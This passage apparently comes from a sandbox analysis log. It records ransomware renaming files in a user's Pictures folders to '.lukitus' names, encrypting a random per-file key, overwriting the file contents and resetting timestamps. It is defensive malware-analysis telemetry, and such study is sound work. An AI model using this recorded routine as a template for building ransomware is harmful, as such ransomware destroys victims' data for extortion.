lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x17958, lpOverlapped=0x0) returned 1 [0107.788] SetFilePointer (in: hFile=0x328, lDistanceToMove=524288, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x80000 [0107.788] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x17958, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x17958, lpOverlapped=0x0) returned 1 [0107.788] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.788] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x6444ad30, dwHighDateTime=0x1d31760)) [0107.789] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.789] FlushFileBuffers (hFile=0x328) returned 1 [0107.797] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\_2aELz\\6fTf.jpg" (normalized: "c:\\users\\aetadzjz\\pictures\\_2aelz\\6ftf.jpg"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c4afae0, ftCreationTime.dwHighDateTime=0x1d303e3, ftLastAccessTime.dwLowDateTime=0xa4a0, ftLastAccessTime.dwHighDateTime=0x1d2fc49, ftLastWriteTime.dwLowDateTime=0xa4a0, ftLastWriteTime.dwHighDateTime=0x1d2fc49, nFileSizeHigh=0x0, nFileSizeLow=0x5f86)) returned 1 [0107.797] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.797] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.797] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.797] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.797] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.797] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.797] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.797] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.797] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.797] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.797] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.797] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.797] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.797] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.797] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.797] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.797] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.797] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.797] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.797] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.797] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Pictures\\_2aELz\\6fTf.jpg" (normalized: "c:\\users\\aetadzjz\\pictures\\_2aelz\\6ftf.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.798] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Pictures\\_2aELz\\6fTf.jpg" (normalized: "c:\\users\\aetadzjz\\pictures\\_2aelz\\6ftf.jpg"), lpNewFileName="c:\\Users\\aETAdzjz\\Pictures\\_2aELz\\F56924BE-9663-41BB-1753EF9E-5A7F628573FD.lukitus" (normalized: "c:\\users\\aetadzjz\\pictures\\_2aelz\\f56924be-9663-41bb-1753ef9e-5a7f628573fd.lukitus"), dwFlags=0x9) returned 1 [0107.799] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.799] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.804] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x5f86, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x5f86, lpOverlapped=0x0) returned 1 [0107.804] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.804] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x5f86, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x5f86, lpOverlapped=0x0) returned 1 [0107.805] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.805] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64470e90, dwHighDateTime=0x1d31760)) [0107.805] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.806] FlushFileBuffers (hFile=0x328) returned 1 [0107.810] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\_2aELz\\L5Wat-o9ZxSO52M2hy_.jpg" (normalized: "c:\\users\\aetadzjz\\pictures\\_2aelz\\l5wat-o9zxso52m2hy_.jpg"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82740270, ftCreationTime.dwHighDateTime=0x1d2f94b, ftLastAccessTime.dwLowDateTime=0x5f2431f0, ftLastAccessTime.dwHighDateTime=0x1d2f78e, ftLastWriteTime.dwLowDateTime=0x5f2431f0, ftLastWriteTime.dwHighDateTime=0x1d2f78e, nFileSizeHigh=0x0, nFileSizeLow=0x14425)) returned 1 [0107.810] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.810] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.810] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.810] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.810] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.810] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.810] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.810] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.810] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.810] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.810] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.810] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.810] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.810] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.810] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.810] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.810] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.810] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.810] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.810] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.810] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.810] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Pictures\\_2aELz\\L5Wat-o9ZxSO52M2hy_.jpg" (normalized: "c:\\users\\aetadzjz\\pictures\\_2aelz\\l5wat-o9zxso52m2hy_.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.810] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Pictures\\_2aELz\\L5Wat-o9ZxSO52M2hy_.jpg" (normalized: "c:\\users\\aetadzjz\\pictures\\_2aelz\\l5wat-o9zxso52m2hy_.jpg"), lpNewFileName="c:\\Users\\aETAdzjz\\Pictures\\_2aELz\\F56924BE-9663-41BB-6EDC54F4-2A6316BC2A6D.lukitus" (normalized: "c:\\users\\aetadzjz\\pictures\\_2aelz\\f56924be-9663-41bb-6edc54f4-2a6316bc2a6d.lukitus"), dwFlags=0x9) returned 1 [0107.812] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.812] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.817] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x14425, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x14425, lpOverlapped=0x0) returned 1 [0107.817] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.818] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x14425, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x14425, lpOverlapped=0x0) returned 1 [0107.818] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.818] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64496ff0, dwHighDateTime=0x1d31760)) [0107.818] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.818] FlushFileBuffers (hFile=0x328) returned 1 [0107.822] GetFileAttributesExW (in: lpFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xd6b22)) returned 1 [0107.822] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.822] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.822] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.822] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.822] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.822] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.822] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.822] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.822] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.822] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.822] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.822] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.822] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.822] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.822] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.822] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.822] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.822] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.822] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.822] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.822] CreateFileW (lpFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.822] MoveFileExW (lpExistingFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), lpNewFileName="c:\\Users\\Public\\Pictures\\Sample Pictures\\F56924BE-9663-41BB-AD1CA3C0-3165AB58AF89.lukitus" (normalized: "c:\\users\\public\\pictures\\sample pictures\\f56924be-9663-41bb-ad1ca3c0-3165ab58af89.lukitus"), dwFlags=0x9) returned 1 [0107.830] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.830] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.835] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0107.858] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.859] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x80000, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x80000, lpOverlapped=0x0) returned 1 [0107.860] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x56b22, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x56b22, lpOverlapped=0x0) returned 1 [0107.862] SetFilePointer (in: hFile=0x328, lDistanceToMove=524288, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x80000 [0107.862] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x56b22, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x56b22, lpOverlapped=0x0) returned 1 [0107.863] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.863] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64509410, dwHighDateTime=0x1d31760)) [0107.863] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.864] FlushFileBuffers (hFile=0x328) returned 1 [0107.875] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\OZhWRjVb5.gif" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\ozhwrjvb5.gif"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3062f340, ftCreationTime.dwHighDateTime=0x1d2fa29, ftLastAccessTime.dwLowDateTime=0xc1d94250, ftLastAccessTime.dwHighDateTime=0x1d305ca, ftLastWriteTime.dwLowDateTime=0xc1d94250, ftLastWriteTime.dwHighDateTime=0x1d305ca, nFileSizeHigh=0x0, nFileSizeLow=0x15984)) returned 1 [0107.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.875] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0107.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0107.875] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0107.875] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\OZhWRjVb5.gif" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\ozhwrjvb5.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0107.876] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\OZhWRjVb5.gif" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\ozhwrjvb5.gif"), lpNewFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\F56924BE-9663-41BB-5D8CB0E5-0F44328ECAF2.lukitus" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\f56924be-9663-41bb-5d8cb0e5-0f44328ecaf2.lukitus"), dwFlags=0x9) returned 1 [0107.877] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0107.877] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0107.882] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x15984, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x15984, lpOverlapped=0x0) returned 1 [0107.883] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0107.883] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x15984, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x15984, lpOverlapped=0x0) returned 1 [0107.883] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0107.884] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x6452f570, dwHighDateTime=0x1d31760)) [0107.884] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0107.884] FlushFileBuffers (hFile=0x328) returned 1 [0107.887] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Pictures\\8lYa8AgxgSi0\\mk3Q8l7gVRDjyXXB.bmp" (normalized: "c:\\users\\aetadzjz\\pictures\\8lya8agxgsi0\\mk3q8l7gvrdjyxxb.bmp"), 